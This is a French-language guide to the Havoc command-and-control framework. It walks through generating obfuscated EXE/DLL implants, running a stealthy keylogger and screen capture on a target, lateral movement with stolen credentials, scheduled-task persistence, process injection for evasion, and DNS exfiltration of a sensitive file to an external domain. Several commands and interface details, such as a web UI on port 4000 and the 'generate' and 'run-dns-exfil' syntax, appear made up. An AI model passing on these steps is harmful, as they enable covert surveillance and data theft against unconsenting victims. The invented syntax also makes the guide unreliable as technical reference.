🔥 Havoc - Guide Avancé
Havoc est un framework offensif moderne destiné aux Red Teams pour orchestrer des campagnes complexes. Doté de fonctionnalités avancées, il offre des capacités uniques pour contourner les défenses et automatiser des attaques sophistiquées. 🚀
1️⃣ Pré-requis
- Distribution Linux (Kali, Parrot, Ubuntu, etc.).
- Docker et Docker Compose installés (recommandé).
- Git pour cloner le projet.
- Environnement de test Windows (VM ou physique).
- Connaissance des bases de Red Teaming, des réseaux et des outils offensifs.
2️⃣ Installation et Configuration de Havoc
Étape 1 : Télécharger Havoc
Clonez le dépôt officiel :
git clone https://github.com/HavocFramework/Havoc.git
Accédez au répertoire :
cd Havoc
Étape 2 : Installer les Dépendances
Mettez à jour votre système et installez Docker :
sudo apt update
sudo apt install docker docker-compose -y
Étape 3 : Lancer Havoc avec Docker
Construisez et exécutez Havoc dans un conteneur :
sudo docker-compose build
sudo docker-compose up -d
Accédez à l’interface web de Havoc :
http://localhost:4000
3️⃣ Génération de Payloads
Étape 1 : Configurer un Listener
Depuis l’interface web, configurez un listener :
- Nom :
havoc_listener - Protocole : HTTP ou HTTPS
- Port : 8080
- IP : Adresse IP de votre serveur
Étape 2 : Générer un Payload
Générez un payload en EXE ou DLL :
generate --listener havoc_listener --format exe --output payload.exe
Pour des payloads obfusqués :
generate --listener havoc_listener --format dll --output obfuscated.dll --obfuscate true
4️⃣ Exploitation et Commandes Avancées
Démarrer une Session
Une fois le payload exécuté, interagissez avec la session active :
shell: Accédez à un terminal interactif.download [fichier]: Téléchargez un fichier.screenshot: Capturez l'écran de la cible.keylogger start: Activez un keylogger furtif.
Déplacement Latéral
Pivotez vers d'autres machines :
lateral-movement --target --username --password
Persistance
Ajoutez une tâche planifiée :
schtasks /create /tn "HavocTask" /tr C:\path\to\payload.exe /sc onlogon
5️⃣ Techniques Anti-Analyse
- Utilisez des outils comme ScareCrow pour modifier les signatures des payloads.
- Ajoutez des délais et des variations dans les connexions :
agents interact
sleep 600
process-inject --pid --payload
6️⃣ Scénarios Avancés
Scénario 1 : Capture de Données Sensibles
Récupérez des fichiers critiques sur la machine cible :
download C:\Users\User\Documents\important.docx
Scénario 2 : Surveillance Active
Surveillez les activités en temps réel :
screenshot
keylogger start
Scénario 3 : Reconnaissance Active Directory
Cartographiez l’Active Directory :
run-powershell "Get-ADUser -Filter * | Select-Object Name,LastLogonDate"
Scénario 4 : Exfiltration via DNS
Exfiltrez des données via des canaux DNS :
run-dns-exfil --domain exfil.mydomain.com --file sensitive_data.txt
7️⃣ Automatisation et Sécurisation
Scripts Automatisés
#!/bin/bash
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
sudo docker-compose up -d
Sécurisez votre Infrastructure
- Utilisez des pare-feux pour limiter les accès.
- Chiffrez vos communications avec des listeners HTTPS.
- Surveillez les logs pour détecter les anomalies :
tail -f /var/log/havoc.log
8️⃣ Sécurité et Conformité
⚠️ Important : Havoc doit être utilisé uniquement dans des environnements contrôlés et autorisés.